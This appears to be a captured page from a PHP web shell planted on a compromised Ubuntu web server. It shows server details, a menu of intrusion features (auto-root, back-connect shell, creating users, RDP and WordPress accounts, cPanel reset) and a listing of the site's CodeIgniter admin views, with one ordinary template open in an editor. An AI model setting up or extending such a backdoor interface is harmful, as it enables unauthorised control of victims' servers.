Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
application /
views /
admin /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
ablog-content.php
15.55
KB
-rwxr-x--x
ablog-list.php
4.11
KB
-rwxr-x--x
ablog.php
9.8
KB
-rwxr-x--x
cat-content.php
14.67
KB
-rwxr-x--x
cat-list.php
4.41
KB
-rwxr-x--x
cat.php
11.79
KB
-rwxr-x--x
corse-content.php
24.91
KB
-rwxr-x--x
corse-list.php
5.01
KB
-rwxr-x--x
corse.php
11.97
KB
-rwxr-x--x
dashboard-content.php
7.49
KB
-rwxr-x--x
dashboard.php
4.9
KB
-rwxr-x--x
evnt-content.php
22.8
KB
-rwxr-x--x
evnt-list.php
5.78
KB
-rwxr-x--x
evnt.php
13.14
KB
-rwxr-x--x
item-content.php
29.69
KB
-rwxr-x--x
item-list.php
5.48
KB
-rwxr-x--x
item.php
14.06
KB
-rwxr-x--x
jobc-content.php
24.4
KB
-rwxr-x--x
jobc-list.php
5
KB
-rwxr-x--x
jobc.php
11.97
KB
-rwxr-x--x
mdc-content.php
14.59
KB
-rwxr-x--x
mdc-list.php
5.61
KB
-rwxr-x--x
mdc.php
10.77
KB
-rwxr-x--x
mems-content.php
16.55
KB
-rwxr-x--x
mems-list.php
4.44
KB
-rwxr-x--x
mems.php
10.73
KB
-rwxr-x--x
pages-content.php
11.04
KB
-rwxr-x--x
pages-list.php
2.57
KB
-rwxr-x--x
pages.php
10.41
KB
-rwxr-x--x
proj-content.php
24.42
KB
-rwxr-x--x
proj-list.php
5.85
KB
-rwxr-x--x
proj.php
12.63
KB
-rwxr-x--x
projt-content.php
5.66
KB
-rwxr-x--x
projt-list.php
3.84
KB
-rwxr-x--x
projt.php
8.67
KB
-rwxr-x--x
puba-content.php
5.66
KB
-rwxr-x--x
puba-list.php
3.87
KB
-rwxr-x--x
puba.php
8.67
KB
-rwxr-x--x
publ-content.php
27.35
KB
-rwxr-x--x
publ-list.php
6.23
KB
-rwxr-x--x
publ.php
12.66
KB
-rwxr-x--x
pubv-content.php
5.66
KB
-rwxr-x--x
pubv-list.php
3.87
KB
-rwxr-x--x
pubv.php
8.67
KB
-rwxr-x--x
udig-content.php
5.62
KB
-rwxr-x--x
udig-list.php
3.59
KB
-rwxr-x--x
udig.php
8.67
KB
-rwxr-x--x
user-content.php
32.34
KB
-rwxr-x--x
user-list.php
5.77
KB
-rwxr-x--x
user.php
13.49
KB
-rwxr-x--x
wrks-content.php
24.38
KB
-rwxr-x--x
wrks-list.php
5
KB
-rwxr-x--x
wrks.php
11.84
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mems-list.php
<?php defined('BASEPATH') OR exit('No direct script access allowed'); ?> <section class="panel"> <div> <table class="table table-bordered table-striped mb-none" id="datatable-default"> <?php $tClmn = 8; if(count($rdList) > 0) { $Clmn1 = ($NEW_TD_ID=='FNYR-ASC') ? 'FNYR-DESC' : 'NAME-ASC'; $Icon1 = ($SORT_NAME=='FNYR') ? 'fa fa-sort-numeric-'.strtolower($SORT_TYPE) : 'fa fa-sort'; $Clmn2 = ($NEW_TD_ID=='NAME-ASC') ? 'NAME-DESC' : 'NAME-ASC'; $Icon2 = ($SORT_NAME=='NAME') ? 'fa fa-sort-alpha-'.strtolower($SORT_TYPE) : 'fa fa-sort'; $Clmn3 = ($NEW_TD_ID=='STATUS-ASC') ? 'STATUS-DESC' : 'STATUS-ASC'; $Icon3 = ($SORT_NAME=='STATUS') ? 'fa fa-sort-numeric-'.strtolower($SORT_TYPE) : 'fa fa-sort'; ?> <thead> <tr style="background-color:<?=E_CLR;?>;"> <th style="border:2px solid #FFF; border-left:none;"><?=$this->lang->line('GL_SL');?></th> <th style="border:2px solid #FFF;text-align:left;" class="sort-heading" id="<?=$Clmn1;?>"><i class="<?=$Icon1;?>"></i>Memory Year</th> <th style="border:2px solid #FFF;text-align:left;" class="sort-heading" id="<?=$Clmn2;?>"><i class="<?=$Icon2;?>"></i>Memory Title</th> <th style="border:2px solid #FFF;text-align:right;" class="sort-heading" id="<?=$Clmn3;?>"><i class="<?=$Icon3;?>"></i><?=$this->lang->line('_STS_');?></th> <th style="border:2px solid #FFF; border-right:none;text-align:right; width:145px;"><?=$this->lang->line('_ACTION_');?></th> </tr> </thead> <tbody> <?php $i=1; foreach($rdList as $key =>$Row) { $SiteUrl = $URL['RDR_URL'].'/'.StrRplace($this->encryption->encrypt($Row['Id'])); $upUrl = $URL['IMG_URL'].'/'.StrRplace($this->encryption->encrypt($Row['Id'])); $DelUrl = $URL['DEL_URL'].'/'.StrRplace($this->encryption->encrypt($Row['Id'])); $DtlUrl = $URL['DTL_URL'].'/'.StrRplace($this->encryption->encrypt($Row['Id'])); $uv_BG =($i%2 == 0)? G_CLR:B_CLR; ?> <tr class="gradeX" style="background-color:<?=$uv_BG;?>;"> <td style="border:2px solid #FFF; border-left:none;"><?=$Row['Sr'];?></td> <td style="border:2px solid #FFF;" align="left"><?=Yr2T4(substr($Row['FNYR'], 0, 2)).' - '.Yr2T4(substr($Row['FNYR'], 2, 4));?></td> <td style="border:2px solid #FFF;" align="left"><?=$Row['NAME'];?></td> <td style="border:2px solid #FFF; text-align:right;"><?=($Row['STATUS']==STATUS_A)?$this->lang->line('GL_ACTIVE'):$this->lang->line('GL_INACTIVE');?></td> <td style="border:2px solid #FFF; border-right:none;"align="right"><?php if($DEL_CHK==TRUE && ($Row['STATUS']==STATUS_I)){?><a href="<?=site_url($DelUrl);?>"><button type="button" class="btn bg-danger btn-sm" title="Delete Details"><i class="fa fa-trash-o"></i></button></a> <?php }if($EDT_CHK==TRUE){?><a href="<?=site_url($SiteUrl);?>"><button type="button" class="btn bg-primary btn-sm" title="Edit Details"><i class="fa fa-edit"></i></button></a> <?php }?><a href="<?=site_url($upUrl);?>"><button type="button" class="btn bg-info btn-sm" title="Upload Images"><i class="fa fa-file-image-o"></i></button></a> <a href="<?=site_url($DtlUrl);?>"><button type="button" class="btn bg-success btn-sm" title="View Details"><i class="fa fa-eye"></i></button></a></td> </tr> <?php $i++; } ?> </tbody> <?php }else{ ?> <thead> <tr style="background-color:<?=E_CLR;?>;"> <th colspan="<?=$tClmn;?>" align="center"><span class="headRed"><?=$this->lang->line('NO_RCRDS');?></span></th> </tr> </thead> <?php } ?> </table> </div> <?php if(count($rdList) > 0){?><div class="pagination"><?=$this->ajax_pagination->create_links();?></div><?php } ?> </section>
Close